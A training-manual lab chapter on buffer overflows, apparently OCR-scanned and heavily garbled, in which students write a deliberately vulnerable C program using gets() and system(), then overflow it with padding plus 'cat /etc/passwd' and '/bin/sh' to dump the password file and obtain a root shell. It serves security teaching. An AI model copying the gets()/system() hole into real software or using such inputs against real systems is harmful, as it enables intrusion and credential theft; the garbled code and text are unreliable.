CEH Lab M anual

B u f f e r O v e r f lo w
M o d u le

1 8


Module 18 - Buffer Overflow

Buffer Overflow Attack
In a buffer overflow, while writing data to a biffer, the b/ffer’s boundary is
overrun and adjacent memory is overwritten.
I CON KEY

Lab Scenario

Valuable
in to in iad o a______

Source: h ttp ://www.1c.u11icam p.br/~stolfi/urna/butfer-oflow

Test your
knowledge

Hackers continuously look for vulnerabilities 111 software or a computer to break into
the system by exploiting these vulnerabilities.

sA

W eb exercise

m

W orkbook review

The most common vulnerability often exploited is die buffer overflow attack, where
a program failure occurs eidier 111 allocating sufficient memory for an input string or
111 testing die lengdi o f string if it lies within its valid range. A hacker can exploit such
a weakness by submitting an extra-long input to the program, designed to overflow
its allocated input buffer (temporary storage area) and modify the values of nearby
variables, cause the program to jump to unintended places, or even replace the
program's instructions by arbitrary code.
If the buffer overflow bugs lie 111 a network service daemon, the attack can be done
by direcdy feeding the poisonous input string to the daemon. If the bug lies 111 an
ordinary system tool or application, with no direct access, the hacker attaches the
poisonous string widi a document or an email which, once opened, will launch a
passive buffer overflow attack. Such attacks are equivalent to a hacker logging into
the system widi die same user ID and privileges as die compromised program.
Buffer overflow bugs are especially common 111 C programs, since that language
does not provides built-in array bound checking, and uses a final null byte to mark
the end of a string, instead o f keeping its length 111 a separate field. To make dungs
worse, C provides many library functions, such as s t r c a t and g e t l i n e , which copy
strings without any bounds-checking.
As an expert ethical hacker and penetration tester, you must have sound
knowledge of when and how buffer overflow occurs. You must understand stacksbased and heap-based buffer overflows, perform penetration te s ts for detecting
buffer overflows in programs, and take precautions to prevent programs trom
buffer overflow attacks.

Lab Objectives
The objective o f tins lab is to help students to learn and perform buffer

overflow attacks to execute passwords.
111

C E H L ab M an u al Page 902

tins lab, you need to:
■

Prepare a script to overflow buffer

■

Run the script against an application

E th ica l H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


Module 18 - Buffer Overflow

& This lab can
be dem onstrated
using Backtrack
Virtual Machine

■

Perform penetration testing for the application

■


Enum erate a password list

Lab Environment
■

A computer running with Windows Server 2012 as Host machine

■

A Virtual Machine running with Back Track 5 R3

■

A web browser with Internet access

■

Administrative privileges to

11111

tools

Lab Duration
Time: 20 Aluiutes

Overview of Buffer Overflow
Buffer overflow is an anomaly where a program, while wnting data to a buffer,
overruns the butter's boundary and overwrites adjacent memory. Tins is a special

case of violation o f memory safety. Butter overflows can be triggered by inputs that
are designed to execute code, or alter the way the program operates. Tins may result
111 erratic program behavior, including memory access errors, incorrect results, a
crash, or a breach of system security. Thus, they are the basis o f many software
vulnerabilities and can be maliciously exploited.

Lab Tasks

2* TASK 1

Recommended labs to assist you 111 buffer overflow:

Overview

■

Enumerating Passwords 111 “Default Password List”
o

W rite a Code

o

Compile die Code

o

Execute the Code

o


Perform Buffer Overflow Attack

o

Obtain Command Shell

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on
your target’s security posture and exposure.

P L E A S E TALK T O Y O U R I N S T R U C T O R IF YOU
R E L A T E D T O T H I S LAB.

C E H L ab M an u al Page 903

HAVE

QUESTIONS

E th ica l H a ck in g a nd C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


Module 17 - Buffer Overflow

Buffer Overflow Example
In a b/rffer oveijlow, while writing data to a b/rffer, the buffer's boundary is
overrun and adjacent memory is overwritten.
ICON


Lab Scenario

KEY

/ Valuable
inform ation

y* T est your
knowledge

s

W eb exercise

m

W orkbook review

111 computer security and programming, a buffer overflow, 01‫ ־‬buffer overrun,
vulnerability appears where an application needs to read external information such as
a character string, the receiving butter is relatively small compared to the possible
size o f die input string, and the application doesn't check the size. The buffer
allocated at run-time is placed 011 a stack, which keeps the information for executing
functions, such as local variables, argument variables, and the return address. The
overflowing string can alter such information. Tins also means that an attacker can
change the information as he 01‫ ־‬she wants to. For example, the attacker can inject a
series o f macliine language commands as a string that also leads to the execution of
the attack code bv changing the return address to the address of the attack code. The
ultimate goal is usually to get control of a privileged shell by such methods.


Programming languages commonly associated with buffer overflows include C and
C ++, which provide 110 built-in protection against accessing 01‫ ־‬overwriting data 111
any part of memory and do not automatically check that data written to an array (the
built-in buffer type) is within the boundaries ot that array. Bounds checking can
prevent buffer overflows.
As a penetration tester, you should be able to implement protection against stacksmaslung attacks. You must be aware of all the defensive measures for buffer
overflow attacks. You can prevent buffer overflow attacks by implementing 11111time checks, address obfuscation, randomizing location of functions 111 libc,
analyzing static source code, marking stack as non-execute, using type safe languages
such as Java, ML, etc.

Lab Objectives
The objective o f tins lab is to help students to learn and perform buffer
overflow to execute passwords.
111

C E H L ab M an u al Page 904

tins lab, you need to:

E th ical H a ck in g and C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


Module 17 - Buffer Overflow

■

Prepare a script to overflow buffer


■

Run the script against an application

■

Perform penetration testing for the application

■

Enum erate a password list

Lab Environment

I T This lab can
be dem onstrated
using Backtrack
Virtual Machine

■

A computer running with Windows Server 2012 as Host maclune

■

A Virtual Machine running with Back Track 5 R3

■

A web browser with Internet a c c e s s


■

Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Buffer Overflow
Buffer overflow takes place when data written to a buffer because of insufficient
bounds checking corrupts the data values 111 memory addresses, which are
adjacent to the allocated buffer. Most often diis occurs when copying strings of
characters from one buffer to another.
When die following program is compiled and mil, it will assign a block ot memory
11 bytes long to hold die attacker string, strcpv function will copy the string
“D D D D D D D D D D D D D D ” into an attacker string, which will exceed the buffer
size of 11 bytes, resulting 111 buffer overflow.

BufferOverflowExam
pleCode
#include<stdio.h>

0 1 2 3 4 5 6 7 8 9 10 1112
D D D D D D D D D D D D \ o

String

int main ( int argc, char * *argv)

{


3 4

char B u fferfll] =‫״‬AAAAAAAAAA‫;״‬

■cA

5 6 7

89

A A A A A A A A A

10
\0

strcpylBuffer/DDDDDDDDDODD‫;}״‬
printf(“96 \n ‫״‬. Buffer);

1 2

3 4

i

S7 6‫״‬

return 0;

}

This type o f vulnerability is prevalent in UNIX• and NT-based systems

Lab Tasks
S

TASK 1

Write a Code

C E H L ab M anual Page 905

1. Launch your Back Track 5 R3 Virtual Machine.
2. For bdogin, type root and press Enter. Type the password as toor, and
press Enter to log 111 to BackTrack virtual maclune.

E th ical H a ck in g and C o untenneasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


Module 17 - Buffer Overflow

‫־‬R ‫ * ״‬T

BackTrack on WIN 2N9STOSGIEN Virtual Machine Connection
‫ י‬kVia Clipboard View

@3 1‫►וו‬h ‫פ‬

i . 0933761 HET: Registered protocol fa n ily 17
1.0915311 input: AT T ranslated Set 2 keyboard as /dc1;iccs^platfor1v'i8l>12/'scrio0/input/'inputl

1.0952761 Registering the dns resolver key type
1.0957B31 registered taskstats version 1
1.1639921 llagic nunber: 12:1ZU:12G
1.1644561 acpi device:01: hash notches
1.1056581 rtc.cnos 00:02: setting syste* clock to 2012-09-25 11:06:59 UTC(1340571219)
1.165468) BIOS EDO fa c il i t y v0.16 2004-Jun-25, 0 devices found
1.1658621 COD information not ava llable.
1.2378181 a ta t.06: ATA-8: U irtu al HD, 1.1.0, raax MUDMfi2
1.2389361 atat.06: 33554432 scctors, n u lti 12B: LBA48
1.2415511 ataZ.06: filAPI: U irtu al CD, , wax hllDt1A2
1.2432671 ata2.06: configured fo r
MUM1n2
1.2441101 a tal.0 6: configured fo r
flUDHflZ
1.2442231 scsi 0:0:0:6: Direct-Access
ATA
V irtua l HO
1.1. PQ: 6 AMSI: 5
1.2451571 sd 0:0:0:0: (sdal 33554432 512-byte logical blocks: (17.1GB/‫׳‬lb.O
GiB)
1.2455461 sd 0:0:0:0: lsd< l 4096-hyte physical blocks
1.2459741 sd 0:0:0:0: (sdal Write Protect Is o ff
1.2463841 sd 0:0:0:0: Attached scsi generic sgO type 0
1.2468141 sd 0:0:0:0: fsdal U rlte cache: enabled, read cache: enabled, doesn't support DPT nr Flh
1.2404231 scsi 1:0:0 0: CD ROM
Hsft
U irtu al CD/ROM
1.0 PQ: 6 AHSI 5
tray
1.2515061 sr6: scsi3 mik drive:

1.2526091 cdron: Uniforn CD HUM d river Revision: 3.26
1.2527931 * r 1:0:0:0: Attached scsi generic sgl type 5
1.2506571 sda: sdal r.da2 < xda5 >
1.2506591 ad 0:0:0:0: Inda I Attached 8C5I disk
1.2602631 Freeing iiiiiisimI kernel **:wiry; 96Hk fn x d
1.2608041 U rlte p ro tec tI M| the kernel read only data: 1228Hk
1.26S624I Freeing unused kernel M M inj: 1732k freed
1.2699051 Prering unused kernel !*rnorij: 1492k freed
ling, please w a it...
1.2873151 udev: s ta rtin g version 151
1.2962U0I udevd (03): /•prot/‫׳‬U3/uon adj is deprecated. please use /proc/OJ/oon score adj instead.
1.3963921 Floppy driv e (s ): fdO is 1.44f1
1.41 rilH I PDC 6 is an 02070.
2.0203071 Refined T8C clocksource ca lib ra tio n : 3692.970 fW‫׳־‬..

1

0x/0k

1

FIGURE 1.1: BackTrackLogin
_ Bufferoverflowoccurs
whenaprogramor process
tries to storemore dataina
buffer.

3. Type startx to launch die GUI.
1-1°‫־* ־‬


BackTrack on WIN-2N9STOSGIEN Virtual Machine Connection
■Re irrior I.V44 CSpbeard Vie

I't •>(- ©3 111►h

1.24S974I sd 0:0:6:6: (sdal U rlte Protect Is o ff
1.2463841 sd 0:0:6:6: Attached scsI generic sy6 type 6
1.2468141 sd 0:0:0:©: tsdal U rlte cache: enabled, read cache: enabled, doesn't support DP0 or FU
1.2404231 scsi 1:6:6:0: CD ROM
Msft
U irtu al CD-ROM 1 6 PQ: 6 ANSI: 5
1.2515061 sr6: scsi3‫־‬rwc drive: 0x/0‫־‬x tray
1.252*091 cdrm : Onifcrn CD-HW driver Revision: 3.20
I .2527931 s r !:0 :6 :6 : Attached scsi generic syl type 5
I .2586571 sda: sdal sda2 < sd»5 >
1.2506591 sd 0:0:6 6: (sdal attached SCSI disk
1.2602631 freeing unused kernel ncmury: 'J6UK freed
1.2I10H04I Write protecting the kernel read-only data: IZZIMIk
1.2656241 FreeIny unused kernel nennry: 1732k freed
1.2699851 Freeing unused kernel nonary: 1492k freed
ading, please u a lt...
1.2873151 udev: s ta rtin g version 151
1.2962001 udevd (83): /p r v l l l ‫׳‬m_( d j is deprecated, please use /‫׳‬proc/03‫׳׳‬cw»»_score_adj instead.
1.3963921 Floppy driv e (s ): fd6 is 1.44H
1.4139841 F K 6 Is an H267H.
2.0203871 Refined TSC clocksource ca lib ra tio n : 3692.970 life

1

01 01 1


cklrack 5 JO - 64 B it bt t t y l
g iu tined out a fte r 60 seconds.

Systen information as of Iuc Sep 25 16:45:47 1ST 2012
Systea load: 0.08
Usage o f ✓:72.3x o f 15.23GB
rtenory usage: 1‫׳‬
Swap usage:
Ok

Processes:
72
Users logged In:
0
IP address fo r eth6: 10.0.0.14

Graph th is data and w1 na!!r th is systen at https:/✓landscape.canonical.con✓

FIGURE 1.2: BackTrackGUI Login-StartxCommand
4.

BackTrack 5 R3 GUI desktop opens, as shown 111 die following screenshot.

m Codewhichis entered
inkedit is case-sensitive.

C E H L ab M anual Page 906

E th ical H a ck in g and C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.


Module 17 - Buffer Overflow

FIGURE 1.3: BackTrack5R3Desktop
5.

Select the BackTrack Applications menu, and then select A ccessories
gedit Text Editor.
‫־‬y

t. > r*

‫ל‬/Mem (»_J
* ^

*V *«es*o‫׳‬H‫׳‬s
^ BackTtock

^

Oik uwg* Analyzer
oedlt Tfcxt Editor

4 &#***%
£

internet


dioflke

| TWmlrwl

)14 Other

‫ס‬

Tkrminator

WK Sound 6 V^deo
0

System Tools

<< back track

ca

Programminglanguages
commonlyassociatedwith
buffer overflowsincludeC
andC++.

FIGURE 1.4: Launchinggedit Text Editor
6.

Enter die following code 111 gedit Text Editor (Note: the code is casesensitive).
# in c lu d e < s td io . h>
v o id m a in ()

{
c h a r *name;
c h a r *command;
nam e=(char * )m a llo c (10);
command=(char * )m a llo c (128);
p r i n t f ( " a d d r e s s o f name i s : % d\n",nam e);
p r i n t f ( " a d d r e s s o f command i s : %d\n",command);
p r i n t f ( " D i f f e r e n c e betw een a d d re s s i s : %d\n", command-

C E H L ab M anual Page 907

E th ical H a ck in g and C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


Module 17 - Buffer Overflow

nam e);
p r i n t f ("E n te r your n am e:");
g e ts (n a m e );
p r i n t f ("H ello % s\n",nam e);
system (com m and);
}
‫>׳׳‬

v

x *u n s a v e d Docum ent 1 ‫ ־‬g e d it

File Edit View Search Tools Documents Help

^ ^ ^ J o p e n

Ii=y1 Codeis compiledusing
the followingcommend:gee

▼ ^_Save

n *Unsaved Document 1

buffer.cbiiffer.

Undo

^

9k

X

# 1 nclude<std 10 .h>
v o id m ain()

{

char •name;
char •command;
name=(char * )m a llo c (1 0 );
command=(char *)m a llo c (1 2 8 );
p r in tf(" a d d re s s o f name i s : % d\n",name);
p r in tf(" a d d re s s o f command is:% d\n",comm and);

p r i n t f ( “ D iffe re n c e between address is :%d\n“ ,command-name);
p r in t f ( " E n t e r your name:“ ) ;
gets(nam e);
p r in t f ( " H e llo % s\n",name);
system( command);

Plain Text ▼

Tab Width: 8 ▼

Ln 15, Col 2

FIGURE 1.5: Writingcode for execution
7.
‫ ט‬No tool cansolve
completelydieproblemof
buffer overflow, but die)‫■׳‬
surelycandecreasethe
probabilityofstacksmashing
attacks.

Now save die program by selecting File ‫ )־־‬Save A s‫ )־‬root or simply click
Save as shown 111 the following screenshot screenshot as buffer.c.
__ _*

* U n s a v e d D o c u m e n t 1 ‫ ־‬g e d it

File Edit View Search Tools Documents Help

Now launch die command terminal and compile die code by running:

Compile the Code

C E H L ab M anual Page 908

gcc b u f f e r . c -o b u f f e r

E th ical H a ck in g and C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


Module 17 - Buffer Overflow

/v

v

x

ro o t @ b t : -

File Edit View Terminal Help
root@ bt: ‫־־‬# |gcc b u ffe r.c -0 b u ffe rfj

The programexecutes
usingfollowingcommand:
.!buffer

FIGURE 1.7: BackTrackcompilingthecode
9. If there are any errors, ignore them.
/v v X rootcabt: File Edit View Terminal Help

ro o tg b t:-# gcc b u ffe r .c ■0 b u ffe r
b u ffe r .c : In fu n c tio n 'm a in ':
—
b u ffe r .c :6 : warning: in com p atible im p l ic i t d e c la ra tio n o f b u itfs tlH ^ u n c tio n ‘ mal

loc 1^•—— —

‫׳‬

b u ffe r .c :8 : w arning: form at '%d' expects type 1" ‫־‬n t ' , but a rg u m e n t^'tts s type 'ch
ar • ‫׳‬
b u ffe r .c :9 : warning: form at '%d' expects type , i n j ^ o u t argument 2 jM F t y p e *ch
ar »'
g
b u ffe r.c :1 0 : w arning: form at '%d' expects type ' i n t ‫ ׳‬, but a rg um ent# has type ' I
ong i n t '
/tm p/ccx6 Y 3vl.o: In fu n c tio n m a in ':
b u ffe r .c : ( .te x t+ 6 x 9 0 ): warning: the g e ts ' fu n c tio n is dangerous a n ^ t a u ^ ^ i o t
be used.
root@bt:~# [ ]

: b a c k I tra c k
FIGURE 1.8: BackTrackError MessageWindow
— j

10. To execute the program type . /buffer

Execute the Code

C E H L ab M anual P ag e 909


E th ical H a ck in g and C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


Module 17 - Buffer Overflow

‫־־‬

*

ro o t@ b t: ~

File Edit View Terminal Help
r o o tg b t: •‫־‬# | . /b u f fe r |
address o f name is : 20144144
address o f command i s :20144176
D iffe re n c e between address is :32
E nter your name:|

1

m Anexecutableprogram
on adiskcontains a set of
binaryinstructions tobe
executedbydieprocessor.

■

tra c k


b ack

.

^

) 1

‫ם‬
FIGURE 1.9: BackTrackExecutingProgram
11. Type any name in die Input held and press Enter; here, using Jason as an
example.
»

-

:v

x

ro o t@ b t

File Edit View Terminal Help
root@bt:~#
address o f
address o f
D iffe re n c e
Enter your


c a Buffer overflowswork
bymanipulatingpointers
(includingstoredaddresses).

. /b u f f e r
name is : 20144144
command i s : 26144176
between address is : 32
name:|‫ נ‬as |

b a ck I tra c k
FIGURE 1.10: Input Field
12. Hello Jason should be printed.

C E H L ab M anual Page 910

E th ical H a ck in g and C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


Module 17 - Buffer Overflow

/\

- :v

x

ro o t@ b t


File Edit View Terminal Help
ro o t@ b t:~ #
a dd re ss o f
a dd re ss o f
D if f e r e n c e
E n te r y o u r

./b u ffe r
name i s : 26144144
command i s : 20144176
between a dd re ss i s : 32
name: Jason

‫״‬o o t® b t:~ # fl

b a c k I tra c k
FIGURE 1.11: HelloJason
B

T A S K

4

Perform Buffer
Overflow Attack

13. Now, overflow the buffer and execute the listed system commands.
14. Run die program again by typing ./buffer.
15. Tvpe 12345678912345678912345678912345cat /e tc /p a s s w d
Input held.


111 die

16. You can view a printout of die password hie.
a

v

‫ א‬root(g>bt: -

File Edit View Terminal Help

Buffer overflow
vulnerbililties typicallyoccur
incodethat aprogrammer
cannot accratelypredict
buffer overflowbehvior.

ro o t@ b t:~ # . / b u f f e r
a dd re ss o f name i s : 17747984
a dd re ss o f command i s :17748016
D if f e r e n c e between a dd re ss i s :32
E n te r y o u r name:|12345678912345678912345678912345cat /e tc /p a s s w d |
H e llo 12345678912345678912345678912345cat /e tc /p a s s w d
r o o t : x : e : 0 : r o o t : / r o o t : /b in / b a s h
daemon: x : 1 : 1 : daemon: /u s r / s b i n : / b i n / s h
b in : x : 2 : 2 : b i n : / b i n : / b i n / s h
s y s : x : 3 : 3 : sy s : /d e v : /b in /s h

sync: x : 4 :65534:sync: / b i n : /b in /s y n c

games: x : 5 : 6 0 : games: /u s r/g a m e s : / b i n / s h

man: x : 6 : 12 : man: /v a r/cache/m an: /b in /s h
I p : x : 7 :7 : I p : / v a r /s p o o l/lp d : /b in /s h
m a il: x ^ S : 8 : m a il: /v a r / m a iU / b in / s h
_
news: x t : 9 : news: /v a r / s p o jj/ n e w s : / t j^ n / s h g
lu iic p : x : 1 e : l e : iftic jfc /v a r /s p d o l/u u c p ijrb in T M f
p ro xy :x : 1 3 :1 3 :p r o x y :/b 1 n :/b 1 n /s h
I
■
I t
L w w d a t a :x : 3 3 : 3 3 : w w w - d a t a : /v a r / w w \* / b in f t ( l I
I
b a cku p : x : 3 4 :3 4 :b acku p : / v a r / b a c k u p f / b in / s h
U s t : x : 3 8 : 3 8 : M a ilin g L i s t H a n a g e r : / v a r / lis t : / b in / s h
i r e : x : 3 9 : 3 9 : i r e d : /v a r / r u n / i re d : / b i n / s h
g n a t s :x : 4 1 : 4 l: G n a t s B u g -R e p o rtin g System ( a d m in ) : / v a r / li b / g n a t s : / b in / s h
( l i b u u i d : x :1 0 0 :1 6 1 : : / v a r / l i b / l i b u u l d : / b i n / s h

FIGURE 1.12: ExecutingPassword
■m .

T A S K

5

Obtain Command
Shell


C E H L ab M anual Page 911

17. Now, obtain a Command Shell.
18. Run die program again ./buffer and tvpe
12345678912345678912345678912345/ b i n / s h 111 the Input held.

E th ical H a ck in g and C ounterm easures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


Module 17 - Buffer Overflow

/v

v

x

r o o t@ b t: -

File Edit View Terminal Help
ro o t@ b t:~ # . / b u f f e r
address o f name is : 24616976
address o f command i s :24617008
D iffe re n c e between address is :32
E nter your nameJ12345678912345678912345678912345/bm/sh|
H e llo 12345678912345678912345678912345/bin/sh
s h-4.1#
s h-4.1#
sh-4.1# [ ]


m Code scrutiny(writing
securecode) isthe best
possible solutionto
bufferflowattacks.

back

tra c k

FIGURE 1.13: Executing12345678912345678912345678912345/hin/sh
19. Type Exit 111 Shell !Console 01‫ ־‬close the program.

Lab Analysis
Analyze and document die results related to die lab exercise. Giye your opinion
your target’s security posture and exposure.
T o o l/U tility

B uffer Overflow

In fo rm atio n C o lle c te d /O b je c tiv e s A chieved
■

Address o f name is: 24616976

■

Address o f com m and 1s: 24617008

■


Difference between address is: 32

■

Enter your name:
12345678912345678912345678912345/b in / sh

■

Hello
12345678912345678912345678912 3 4 5 /b in /sh

‫י‬

sh-4.1#

‫י‬

sh-4.1#

‫י‬

sh-4.1#

P L E A S E TALK T O Y O U R I N S T R U C T O R IF YOU
R E L A T E D T O T H I S LAB.

C E H L ab M anual Page 912


011

HAVE

QUESTIONS


Module 17 - Buffer Overflow

Questions
1. Evaluate various m ethods to prevent buffer overflow.
2. Analyze how to detect run-time buffer overflow.
3.

Evaluate and list the com m on causes o f buffer-overflow errors under
.N ET language.

In te rn e t C o n n ectio n R eq u ired
D Yes

0N o

P latform S upported
0 C lassroom

C E H L ab M an u al Page 913

0 !Labs

E th ical H a ck in g and C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.